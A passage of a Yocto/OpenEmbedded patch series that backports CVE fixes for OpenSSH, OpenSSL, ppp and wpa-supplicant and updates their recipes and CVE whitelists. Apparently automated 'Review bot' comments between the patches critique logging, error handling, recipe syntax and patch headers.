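+ do_ssh2_kex(struct ssh *ssh)
+ {
+ char *myproposal[PROPOSAL_MAX] = { KEX_SERVER };
++ char *s;
+ struct kex *kex;
+ int r;
+
+- myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(
+- options.kex_algorithms);
++ if ((s = kex_names_cat(options.kex_algorithms, "kex-strict-s-v00@openssh.com")) == NULL)
++ fatal("kex_names_cat");
++ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ myproposal[PROPOSAL_ENC_ALGS_CTOS] = compat_cipher_proposal(
+ options.ciphers);
+ myproposal[PROPOSAL_ENC_ALGS_STOC] = compat_cipher_proposal(
+@@ -2382,6 +2384,7 @@ do_ssh2_kex(struct ssh *ssh)
+ packet_send();
+ packet_write_wait();
+ #endif
++ free(s);
+ debug("KEX done");
+ }
+
+--
+2.25.1
+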
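Review bot: In the `kex_protocol_error()` hunk of kex.c the log line changes from `error("kex protocol error: type %d seq %u", type, seq);` to `error("type %u seq %u", type, seq);`, which drops the only text that identifies the event. The header of this backport says `error*_f()` calls were replaced with plain `error*()`, so the function-name prefix those macros supply has to be restored by hand, e.g. `error("%s: type %u seq %u", __func__, type, seq);`, matching the `"%s: ...", __func__` style already used in these files. Without it, a log search for unexpected packets during key exchange has nothing stable to match on. The added `ninfo >= 1024` check in `kex_input_ext_info()` also disagrees with its own message, which says `<=1024` is accepted.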
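--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
@@ -0,0 +1,95 @@
+From 7ef3787c84b6b524501211b11a26c742f829af1a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:47:44 +0000
+Subject: [PATCH] upstream: ban user/hostnames with most shell metacharacters
+
+This makes ssh(1) refuse user or host names provided on the
+commandline that contain most shell metacharacters.
+
+Some programs that invoke ssh(1) using untrusted data do not filter
+metacharacters in arguments they supply. This could create
+interactions with user-specified ProxyCommand and other directives
+that allow shell injection attacks to occur.
+
+It's a mistake to invoke ssh(1) with arbitrary untrusted arguments,
+but getting this stuff right can be tricky, so this should prevent
+most obvious ways of creating risky situations. It however is not
+and cannot be perfect: ssh(1) has no practical way of interpreting
+what shell quoting rules are in use and how they interact with the
+user's specified ProxyCommand.
+
+To allow configurations that use strange user or hostnames to
+continue to work, this strictness is applied only to names coming
+from the commandline. Names specified using User or Hostname
+directives in ssh_config(5) are not affected.
+
+feedback/ok millert@ markus@ dtucker@ deraadt@
+
+OpenBSD-Commit-ID: 3b487348b5964f3e77b6b4d3da4c3b439e94b2d9
+
+CVE: CVE-2023-51385
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Hunks refreshed to apply cleanly
+
+---
+ ssh.c | 41 ++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 40 insertions(+), 1 deletion(-)
+
+diff --git a/ssh.c b/ssh.c
+index 35c48e62d18..48d93ddf2a9 100644
+--- a/ssh.c
++++ b/ssh.c
+@@ -583,6 +583,41 @@ set_addrinfo_port(struct addrinfo *addrs
+ }
+ }
+
++static int
++valid_hostname(const char *s)
++{
++ size_t i;
++
++ if (*s == '-')
++ return 0;
++ for (i = 0; s[i] != 0; i++) {
++ if (strchr("'`\"$\\;&<>|(){}", s[i]) != NULL ||
++ isspace((u_char)s[i]) || iscntrl((u_char)s[i]))
++ return 0;
++ }
++ return 1;
++}
++
++static int
++valid_ruser(const char *s)
++{
++ size_t i;
++
++ if (*s == '-')
++ return 0;
++ for (i = 0; s[i] != 0; i++) {
++ if (strchr("'`\";&<>|(){}", s[i]) != NULL)
++ return 0;
++ /* Disallow '-' after whitespace */
++ if (isspace((u_char)s[i]) && s[i + 1] == '-')
++ return 0;
++ /* Disallow \ in last position */
++ if (s[i] == '\\' && s[i + 1] == '\0')
++ return 0;
++ }
++ return 1;
++}
++
+ /*
+ * Main program for the ssh client.
+ */
+@@ -1069,6 +1104,10 @@ main(int ac, char **av)
+ if (!host)
+ usage();
+
++ if (!valid_hostname(host))
++ fatal("hostname contains invalid characters");
++ if (options.user != NULL && !valid_ruser(options.user))
++ fatal("remote username contains invalid characters");
+ host_arg = xstrdup(host);
+
+ /* Initialize the command to execute on remote host. */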
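Review bot: `valid_hostname()` and `valid_ruser()` have no comment explaining why their rejected character sets differ, and the difference matters to anyone relying on the check: `valid_ruser()` still accepts `$`, a non-trailing `\`, control characters and whitespace that is not followed by `-`, all of which `valid_hostname()` rejects. I would add a header comment to each, for example `/* Reject names a shell could misinterpret when expanded into ProxyCommand and similar directives; partial mitigation, not a quoting guarantee. */`, and state on `valid_ruser()` that the looser set is intentional (presumably to keep unusual user names working). As the commit message says, the calls in `main()` cover command-line values only, so names set through `User` or `Hostname` in ssh_config(5) are not checked, and callers that build ssh command lines from untrusted data still need their own validation. `main()` continues outside the hunk.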
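--- a/meta/recipes-connectivity/openssh/openssh/sshd.socket
+++ b/meta/recipes-connectivity/openssh/openssh/sshd.socket
@@ -1,5 +1,6 @@
 [Unit]
 Conflicts=sshd.service
+Wants=sshdgenkeys.service
 
 [Socket]
 ExecStartPre=@BASE_BINDIR@/mkdir -p /var/run/sshd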
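--- a/meta/recipes-connectivity/openssh/openssh/sshd@.service
+++ b/meta/recipes-connectivity/openssh/openssh/sshd@.service
@@ -1,13 +1,11 @@
 [Unit]
 Description=OpenSSH Per-Connection Daemon
-Wants=sshdgenkeys.service
 After=sshdgenkeys.service
 
 [Service]
 Environment="SSHD_OPTS="
 EnvironmentFile=-/etc/default/ssh
 ExecStart=-@SBINDIR@/sshd -i $SSHD_OPTS
-ExecReload=@BASE_BINDIR@/kill -HUP $MAINPID
 StandardInput=socket
 StandardError=syslog
 KillMode=process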
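--- a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
+++ b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
@@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \
 and for executing commands on a remote machine."
 HOMEPAGE = "http://www.openssh.com/"
 SECTION = "console/network"
-LICENSE = "BSD & ISC & MIT"
+LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT"
 LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3"
 
 DEPENDS = "zlib openssl virtual/crypt"
@@ -24,14 +24,63 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar
  file://fix-potential-signed-overflow-in-pointer-arithmatic.patch \
  file://sshd_check_keys \
  file://add-test-support-for-busybox.patch \
+ file://CVE-2020-14145.patch \
+ file://CVE-2021-28041.patch \
+ file://CVE-2021-41617.patch \
+ file://CVE-2023-38408-01.patch \
+ file://CVE-2023-38408-02.patch \
+ file://CVE-2023-38408-03.patch \
+ file://CVE-2023-38408-04.patch \
+ file://CVE-2023-38408-05.patch \
+ file://CVE-2023-38408-06.patch \
+ file://CVE-2023-38408-07.patch \
+ file://CVE-2023-38408-08.patch \
+ file://CVE-2023-38408-09.patch \
+ file://CVE-2023-38408-10.patch \
+ file://CVE-2023-38408-11.patch \
+ file://CVE-2023-38408-12.patch \
+ file://CVE-2023-48795.patch \
+ file://CVE-2023-51385.patch \
  "
 SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091"
 SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671"
 
+# This CVE is specific to OpenSSH with the pam opie which we don't build/use here
+CVE_CHECK_WHITELIST += "CVE-2007-2768"
+
 # This CVE is specific to OpenSSH server, as used in Fedora and Red Hat Enterprise Linux 7
 # and when running in a Kerberos environment. As such it is not relevant to OpenEmbedded
 CVE_CHECK_WHITELIST += "CVE-2014-9278"
 
+# As per upstream, because of the way scp is based on a historical protocol called rcp
+# which relies on that style of argument passing and therefore encounters expansion
+# problems. Making changes to how the scp command line works breaks the pattern used
+# by scp consumers. Upstream therefore recommends the use of rsync in the place of
+# scp for better security. https://bugzilla.redhat.com/show_bug.cgi?id=1860487
+CVE_CHECK_WHITELIST += "CVE-2020-15778"
+
+# CVE-2008-3844 was reported in OpenSSH on Red Hat Enterprise Linux and
+# certain packages may have been compromised. This CVE is not applicable
+# as our source is OpenBSD. https://securitytracker.com/id?1020730
+# https://www.securityfocus.com/bid/30794
+CVE_CHECK_WHITELIST += "CVE-2008-3844"
+
+# openssh-ssh1 is provided for compatibility with old devices that
+# cannot be upgraded to modern protocols. Thus they may not provide security
+# support for this package because doing so would prevent access to equipment.
+# The upstream OpenSSH developers see this as an important
+# security feature and do not intend to 'fix' it.
+# https://security-tracker.debian.org/tracker/CVE-2016-20012
+# https://ubuntu.com/security/CVE-2016-20012
+CVE_CHECK_WHITELIST += "CVE-2016-20012"
+
+# As per debian, the issue is fixed by a feature called "agent restriction" in openssh 8.9
+# Urgency is unimportant as per debian, Hence this CVE is whitelisting.
+# https://security-tracker.debian.org/tracker/CVE-2021-36368
+# https://bugzilla.mindrot.org/show_bug.cgi?id=3316#c2
+# https://docs.ssh-mitm.at/trivialauth.html
+CVE_CHECK_WHITELIST += "CVE-2021-36368"
+
 PAM_SRC_URI = "file://sshd"
 
 inherit manpages useradd update-rc.d update-alternatives systemd
@@ -155,12 +204,17 @@ FILES_${PN}-sftp-server = "${libexecdir}/sftp-server"
 FILES_${PN}-misc = "${bindir}/ssh* ${libexecdir}/ssh*"
 FILES_${PN}-keygen = "${bindir}/ssh-keygen"
 
-RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen"
+RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen ${PN}-sftp-server"
 RDEPENDS_${PN}-sshd += "${PN}-keygen ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-keyinit pam-plugin-loginuid', '', d)}"
 RRECOMMENDS_${PN}-sshd_append_class-target = "\
  ${@bb.utils.filter('PACKAGECONFIG', 'rng-tools', d)} \
 "
 
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS:${PN}-dev = ""
+
 # gdb would make attach-ptrace test pass rather than skip but not worth the build dependencies
 RDEPENDS_${PN}-ptest += "${PN}-sftp ${PN}-misc ${PN}-sftp-server make sed sudo coreutils"
 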
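Review bot: The new `RDEPENDS:${PN}-dev = ""` line uses the colon override separator, while every other assignment in this recipe, including the `RDEPENDS_${PN}` line changed in the same hunk, uses the underscore form. If the BitBake on this branch does not treat `:` as an override separator, the line sets a differently named variable, the -dev package keeps its dependency on the base package, and the SDK conflict described in the comment remains. I would write it as `RDEPENDS_${PN}-dev = ""` to match the rest of the file. Separately, the comment above `CVE_CHECK_WHITELIST += "CVE-2016-20012"` justifies the entry by describing an openssh-ssh1 package, which does not obviously correspond to this recipe; since a whitelist entry suppresses the CVE report, that rationale is worth rechecking against the two linked trackers.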
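--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
@@ -0,0 +1,38 @@
+From 679ae2f72ef8cf37609cb0eff5de3b98aa85e395 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Thu, 20 Jul 2023 04:14:42 -1000
+Subject: [PATCH] Configure: add 2 missing key sorts in generation of unified_info
+
+Otherwise generation of this section in configdata.pm is not reproducible
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Backport [adapted from 3.x commit https://github.com/openssl/openssl/commit/764cf5b26306a8712e8b3d41599c44dc5ed07a25]
+---
+ Configure | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Configure b/Configure
+index 2a01746..8fc5a2c 100755
+--- a/Configure
++++ b/Configure
+@@ -2326,7 +2326,7 @@ EOF
+ "dso" => [ @{$unified_info{engines}} ],
+ "bin" => [ @{$unified_info{programs}} ],
+ "script" => [ @{$unified_info{scripts}} ] );
+- foreach my $type (keys %loopinfo) {
++ foreach my $type (sort keys %loopinfo) {
+ foreach my $product (@{$loopinfo{$type}}) {
+ my %dirs = ();
+ my $pd = dirname($product);
+@@ -2347,7 +2347,7 @@ EOF
+ push @{$unified_info{dirinfo}->{$d}->{deps}}, $_
+ if $d ne $pd;
+ }
+- foreach (keys %dirs) {
++ foreach (sort keys %dirs) {
+ push @{$unified_info{dirinfo}->{$_}->{products}->{$type}},
+ $product;
+ }
+--
+2.34.1
+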
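--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
@@ -0,0 +1,37 @@
+From 326909baf81a638d51fa8be1d8227518784f5cc4 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Tue, 14 Sep 2021 12:18:25 +0200
+Subject: [PATCH] Configure: do not tweak mips cflags
+
+This conflicts with mips machine definitons from yocto,
+e.g.
+| Error: -mips3 conflicts with the other architecture options, which imply -mips64r2
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ Configure | 10 ----------
+ 1 file changed, 10 deletions(-)
+
+Index: openssl-3.0.4/Configure
+===================================================================
+--- openssl-3.0.4.orig/Configure
++++ openssl-3.0.4/Configure
+@@ -1243,16 +1243,6 @@ if ($target =~ /^mingw/ && `$config{CC} --target-help 2>&1` =~ m/-mno-cygwin/m)
+ push @{$config{shared_ldflag}}, "-mno-cygwin";
+ }
+
+-if ($target =~ /linux.*-mips/ && !$disabled{asm}
+- && !grep { $_ =~ /-m(ips|arch=)/ } (@{$config{CFLAGS}})) {
+- # minimally required architecture flags for assembly modules
+- my $value;
+- $value = '-mips2' if ($target =~ /mips32/);
+- $value = '-mips3' if ($target =~ /mips64/);
+- unshift @{$config{cflags}}, $value;
+- unshift @{$config{cxxflags}}, $value if $config{CXX};
+-}
+-
+ # If threads aren't disabled, check how possible they are
+ unless ($disabled{threads}) {
+ if ($auto_threads) {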
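--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 09df4395b5071217b76dc7d3d2e630eb8c5a79c2 Mon Sep 17 00:00:00 2001
+From: Matt Caswell <matt@openssl.org>
+Date: Fri, 19 Jan 2024 11:28:58 +0000
+Subject: [PATCH] Add NULL checks where ContentInfo data can be NULL
+
+PKCS12 structures contain PKCS7 ContentInfo fields. These fields are
+optional and can be NULL even if the "type" is a valid value. OpenSSL
+was not properly accounting for this and a NULL dereference can occur
+causing a crash.
+
+CVE-2024-0727
+
+Reviewed-by: Tomas Mraz <tomas@openssl.org>
+Reviewed-by: Hugo Landau <hlandau@openssl.org>
+Reviewed-by: Neil Horman <nhorman@openssl.org>
+(Merged from https://github.com/openssl/openssl/pull/23362)
+
+(cherry picked from commit d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c)
+
+Upstream-Status: Backport [https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c]
+
+CVE: CVE-2024-0727
+
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ crypto/pkcs12/p12_add.c | 18 ++++++++++++++++++
+ crypto/pkcs12/p12_mutl.c | 5 +++++
+ crypto/pkcs12/p12_npas.c | 5 +++--
+ crypto/pkcs7/pk7_mime.c | 7 +++++--
+ 4 files changed, 31 insertions(+), 4 deletions(-)
+
+--- a/crypto/pkcs12/p12_add.c
++++ b/crypto/pkcs12/p12_add.c
+@@ -76,6 +76,13 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ PKCS12_R_CONTENT_TYPE_NOT_DATA);
+ return NULL;
+ }
++
++ if (p7->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA,
++ PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return ASN1_item_unpack(p7->d.data, ASN1_ITEM_rptr(PKCS12_SAFEBAGS));
+ }
+
+@@ -132,6 +139,12 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ {
+ if (!PKCS7_type_is_encrypted(p7))
+ return NULL;
++
++ if (p7->d.encrypted == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA, PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return PKCS12_item_decrypt_d2i(p7->d.encrypted->enc_data->algorithm,
+ ASN1_ITEM_rptr(PKCS12_SAFEBAGS),
+ pass, passlen,
+@@ -159,6 +172,13 @@ STACK_OF(PKCS7) *PKCS12_unpack_authsafes
+ PKCS12_R_CONTENT_TYPE_NOT_DATA);
+ return NULL;
+ }
++
++ if (p12->authsafes->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_AUTHSAFES,
++ PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return ASN1_item_unpack(p12->authsafes->d.data,
+ ASN1_ITEM_rptr(PKCS12_AUTHSAFES));
+ }
+--- a/crypto/pkcs12/p12_mutl.c
++++ b/crypto/pkcs12/p12_mutl.c
+@@ -93,6 +93,11 @@ static int pkcs12_gen_mac(PKCS12 *p12, c
+ return 0;
+ }
+
++ if (p12->authsafes->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_DECODE_ERROR);
++ return 0;
++ }
++
+ salt = p12->mac->salt->data;
+ saltlen = p12->mac->salt->length;
+ if (!p12->mac->iter)
+--- a/crypto/pkcs12/p12_npas.c
++++ b/crypto/pkcs12/p12_npas.c
+@@ -78,8 +78,9 @@ static int newpass_p12(PKCS12 *p12, cons
+ bags = PKCS12_unpack_p7data(p7);
+ } else if (bagnid == NID_pkcs7_encrypted) {
+ bags = PKCS12_unpack_p7encdata(p7, oldpass, -1);
+- if (!alg_get(p7->d.encrypted->enc_data->algorithm,
+- &pbe_nid, &pbe_iter, &pbe_saltlen))
++ if (p7->d.encrypted == NULL
++ || !alg_get(p7->d.encrypted->enc_data->algorithm,
++ &pbe_nid, &pbe_iter, &pbe_saltlen))
+ goto err;
+ } else {
+ continue;
+--- a/crypto/pkcs7/pk7_mime.c
++++ b/crypto/pkcs7/pk7_mime.c
+@@ -30,10 +30,13 @@ int SMIME_write_PKCS7(BIO *bio, PKCS7 *p
+ {
+ STACK_OF(X509_ALGOR) *mdalgs;
+ int ctype_nid = OBJ_obj2nid(p7->type);
+- if (ctype_nid == NID_pkcs7_signed)
++ if (ctype_nid == NID_pkcs7_signed) {
++ if (p7->d.sign == NULL)
++ return 0;
+ mdalgs = p7->d.sign->md_algs;
+- else
++ } else {
+ mdalgs = NULL;
++ }
+
+ flags ^= SMIME_OLDMIME;
+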
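Review bot: In the `SMIME_write_PKCS7()` hunk the new `if (p7->d.sign == NULL) return 0;` fails without queuing an error, whereas the other NULL checks in this patch call `PKCS12err(...)` first, so a caller sees a failure with nothing on the error queue to explain it. Raising an error before that return would let a malformed structure be told apart from other failures in logs; the matching function and reason codes would have to come from the PKCS7 error table, which is not visible here. The second `p12_add.c` hunk reports `PKCS12_F_PKCS12_UNPACK_P7DATA` from what looks like a different `PKCS12_unpack_…` function (the hunk header truncates the name), which would mislabel the error source. The diffstat in the patch header lists 18 lines for `p12_add.c` while its three hunks add 20, so the header was not refreshed along with the hunks.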
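--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
@@ -0,0 +1,22 @@
+Using localtime() means the output can depend on the timezone of the build machine.
+Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Upstream-Status: Pending [should be suitable]
+
+Index: openssl-3.0.1/apps/progs.pl
+===================================================================
+--- openssl-3.0.1.orig/apps/progs.pl
++++ openssl-3.0.1/apps/progs.pl
+@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or
+ my %commands = ();
+ my $cmdre = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/;
+ my $apps_openssl = shift @ARGV;
+-my $YEAR = [localtime()]->[5] + 1900;
++my $YEAR = [gmtime()]->[5] + 1900;
++if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) {
++ $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900;
++}
+
+ # because the program apps/openssl has object files as sources, and
+ # they then have the corresponding C files as source, we need to chain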
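Review bot: The `SOURCE_DATE_EPOCH` guard `$ENV{SOURCE_DATE_EPOCH} !~ /\D/` also accepts an empty string, because an empty value contains no non-digit; `gmtime("")` is then evaluated as epoch 0 and `$YEAR` becomes 1970 in the generated output. Requiring at least one digit closes that case: `if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} =~ /\A\d+\z/) {`. The patch header still names `openssl-3.0.1/apps/progs.pl` although the file is added to the 1.1.1w recipe, so it is worth confirming the hunk applies there without fuzz.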
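--- a/meta/recipes-connectivity/openssl/openssl_1.1.1i.bb
+++ b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
@@ -17,13 +17,17 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \
  file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \
  file://afalg.patch \
  file://reproducible.patch \
+ file://reproducibility.patch \
+ file://0001-Configure-add-2-missing-key-sorts.patch \
+ file://0001-Configure-do-not-tweak-mips-cflags.patch \
+ file://CVE-2024-0727.patch \
  "
 
 SRC_URI_append_class-nativesdk = " \
  file://environment.d-openssl.sh \
  "
 
-SRC_URI[sha256sum] = "e8be6a35fe41d10603c3cc635e93289ed00bf34b79671a3a4de64fcee00d5242"
+SRC_URI[sha256sum] = "cf3098950cb4d853ad95c0841f1f9c6d3dc102dccfcacd521d93925208b76ac8"
 
 inherit lib_package multilib_header multilib_script ptest
 MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash"
@@ -179,6 +183,7 @@ do_install_ptest () {
  install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps
 
  install -d ${D}${PTEST_PATH}/engines
+ install -m755 ${B}/engines/dasync.so ${D}${PTEST_PATH}/engines
  install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines
 }
 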
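--- a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
+++ b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Enables PPP dial-in through a serial connection"
 SECTION = "console/network"
+DESCRIPTION = "PPP dail-in provides a point to point protocol (PPP), so that other computers can dial up to it and access connected networks."
 DEPENDS = "ppp"
 RDEPENDS_${PN} = "ppp"
 PR = "r8"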
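Review bot: The new `DESCRIPTION` string spells the feature "dail-in", while the `SUMMARY` line two lines above uses "dial-in". This text ends up in the package metadata, so it should read `DESCRIPTION = "PPP dial-in provides a point to point protocol (PPP), so that other computers can dial up to it and access connected networks."`.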
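--- /dev/null
+++ b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
@@ -0,0 +1,50 @@
+From 2aeb41a9a3a43b11b1e46628d0bf98197ff9f141 Mon Sep 17 00:00:00 2001
+From: Paul Mackerras <paulus@ozlabs.org>
+Date: Thu, 29 Dec 2022 18:00:20 +0100
+Subject: [PATCH] pppdump: Avoid out-of-range access to packet buffer
+
+This fixes a potential vulnerability where data is written to spkt.buf
+and rpkt.buf without a check on the array index. To fix this, we
+check the array index (pkt->cnt) before storing the byte or
+incrementing the count. This also means we no longer have a potential
+signed integer overflow on the increment of pkt->cnt.
+
+Fortunately, pppdump is not used in the normal process of setting up a
+PPP connection, is not installed setuid-root, and is not invoked
+automatically in any scenario that I am aware of.
+
+Ustream-Status: Backport [https://github.com/ppp-project/ppp/commit/a75fb7b198eed50d769c80c36629f38346882cbf]
+CVE: CVE-2022-4603
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+---
+ pppdump/pppdump.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/pppdump/pppdump.c b/pppdump/pppdump.c
+index 87c2e8f..dec4def 100644
+--- a/pppdump/pppdump.c
++++ b/pppdump/pppdump.c
+@@ -296,6 +296,10 @@ dumpppp(f)
+ printf("%s aborted packet:\n ", dir);
+ q = " ";
+ }
++ if (pkt->cnt >= sizeof(pkt->buf)) {
++ printf("%s over-long packet truncated:\n ", dir);
++ q = " ";
++ }
+ nb = pkt->cnt;
+ p = pkt->buf;
+ pkt->cnt = 0;
+@@ -399,7 +403,8 @@ dumpppp(f)
+ c ^= 0x20;
+ pkt->esc = 0;
+ }
+- pkt->buf[pkt->cnt++] = c;
++ if (pkt->cnt < sizeof(pkt->buf))
++ pkt->buf[pkt->cnt++] = c;
+ break;
+ }
+ }
+--
+2.25.1
+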
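Review bot: The patch header tag is spelled `Ustream-Status:`, so tooling that looks for `Upstream-Status:` will treat this CVE patch as carrying no status; it should read `Upstream-Status: Backport [https://github.com/ppp-project/ppp/commit/a75fb7b198eed50d769c80c36629f38346882cbf]`. `Signed-off-by:Minjae Kim` is also missing the space after the colon. In the code, the first hunk only prints the "over-long packet truncated" notice; the actual bound is the `if (pkt->cnt < sizeof(pkt->buf))` guard in the second hunk, and a short comment there saying that excess bytes are dropped on purpose would make the intent clear. `dumpppp()` starts and ends outside both hunks.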
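--- a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
+++ b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
@@ -34,6 +34,7 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/${BP}.tar.gz \
  file://0001-ppp-Remove-unneeded-include.patch \
  file://ppp-2.4.7-DES-openssl.patch \
  file://0001-pppd-Fix-bounds-check-in-EAP-code.patch \
+ file://CVE-2022-4603.patch \
 "
 
 SRC_URI_append_libc-musl = "\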
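--- a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
+++ b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
@@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood"
 HOMEPAGE = "http://packages.debian.org/resolvconf"
 RDEPENDS_${PN} = "bash"
 
-SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=unstable \
  file://fix-path-for-busybox.patch \
  file://99_resolvconf \
  "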
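--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
@@ -0,0 +1,45 @@
+From 947272febe24a8f0ea828b5b2f35f13c3821901e Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Mon, 9 Nov 2020 11:43:12 +0200
+Subject: [PATCH] P2P: Fix copying of secondary device types for P2P group
+ client
+
+Parsing and copying of WPS secondary device types list was verifying
+that the contents is not too long for the internal maximum in the case
+of WPS messages, but similar validation was missing from the case of P2P
+group information which encodes this information in a different
+attribute. This could result in writing beyond the memory area assigned
+for these entries and corrupting memory within an instance of struct
+p2p_device. This could result in invalid operations and unexpected
+behavior when trying to free pointers from that corrupted memory.
+
+Upstream-Status: Backport
+CVE: CVE-2021-0326
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=947272febe24a8f0ea828b5b2f35f13c3821901e]
+
+Credit to OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=27269
+Fixes: e57ae6e19edf ("P2P: Keep track of secondary device types for peers")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/p2p/p2p.c b/src/p2p/p2p.c
+index a08ba02..079270f 100644
+--- a/src/p2p/p2p.c
++++ b/src/p2p/p2p.c
+@@ -453,6 +453,8 @@ static void p2p_copy_client_info(struct p2p_device *dev,
+ dev->info.config_methods = cli->config_methods;
+ os_memcpy(dev->info.pri_dev_type, cli->pri_dev_type, 8);
+ dev->info.wps_sec_dev_type_list_len = 8 * cli->num_sec_dev_types;
++ if (dev->info.wps_sec_dev_type_list_len > WPS_SEC_DEV_TYPE_MAX_LEN)
++ dev->info.wps_sec_dev_type_list_len = WPS_SEC_DEV_TYPE_MAX_LEN;
+ os_memcpy(dev->info.wps_sec_dev_type_list, cli->sec_dev_types,
+ dev->info.wps_sec_dev_type_list_len);
+ }
+--
+2.17.1
+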
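--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
@@ -0,0 +1,58 @@
+From 8460e3230988ef2ec13ce6b69b687e941f6cdb32 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 8 Dec 2020 23:52:50 +0200
+Subject: [PATCH] P2P: Fix a corner case in peer addition based on PD Request
+
+p2p_add_device() may remove the oldest entry if there is no room in the
+peer table for a new peer. This would result in any pointer to that
+removed entry becoming stale. A corner case with an invalid PD Request
+frame could result in such a case ending up using (read+write) freed
+memory. This could only by triggered when the peer table has reached its
+maximum size and the PD Request frame is received from the P2P Device
+Address of the oldest remaining entry and the frame has incorrect P2P
+Device Address in the payload.
+
+Fix this by fetching the dev pointer again after having called
+p2p_add_device() so that the stale pointer cannot be used.
+
+Fixes: 17bef1e97a50 ("P2P: Add peer entry based on Provision Discovery Request")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
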